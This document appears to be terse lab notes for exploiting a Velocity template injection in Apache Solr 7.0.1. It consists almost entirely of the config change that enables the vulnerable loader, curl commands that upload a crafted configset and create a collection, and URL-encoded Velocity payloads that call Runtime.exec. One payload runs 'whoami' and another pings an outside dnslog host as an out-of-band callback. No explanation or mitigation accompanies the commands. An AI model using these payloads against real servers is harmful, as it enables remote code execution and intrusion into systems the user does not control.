http://archive.apache.org/dist/lucene/solr/7.0.1

     solr.cmd start -c

server/solr/configsets/sample_techproducts_configs/conf

<queryResponseWriter name="velocity" class="solr.VelocityResponseWriter" startup="lazy"><str name="template.base.dir">${velocity.template.base.dir:}</str></queryResponseWriter>

<queryResponseWriter name="velocity" class="solr.VelocityResponseWriter" startup="lazy"><str name="template.base.dir">${velocity.template.base.dir:}</str><str name="solr.resource.loader.enabled">${velocity.solr.resource.loader.enabled:true}</str><str name="params.resource.loader.enabled">${velocity.params.resource.loader.enabled:true}</str></queryResponseWriter>

zip -r - * > yunzui.zip

curl -X POST --header "Content-Type:application/octet-stream" --data-binary @yunzui.zip "http://192.168.60.1:8983/solr/admin/configs?action=UPLOAD&name=yunzui"

curl "http://192.168.60.1:8983/solr/admin/collections?action=CREATE&name=yunzui2&numShards=1&replicationFactor=1&wt=xml&collection.configName=yunzui"

http://192.168.60.1:8983/solr/yunzui2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

http://192.168.60.1:8983/solr/yunzui2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=#set($x='')+#set($rt=$x.class.forName('java.lang.Runtime'))+#set($chr=$x.class.forName('java.lang.Character'))+#set($str=$x.class.forName('java.lang.String'))+#set($ex=$rt.getRuntime().exec('ping se5e2u.dnslog.cn'))+$ex.waitFor()+#set($out=$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end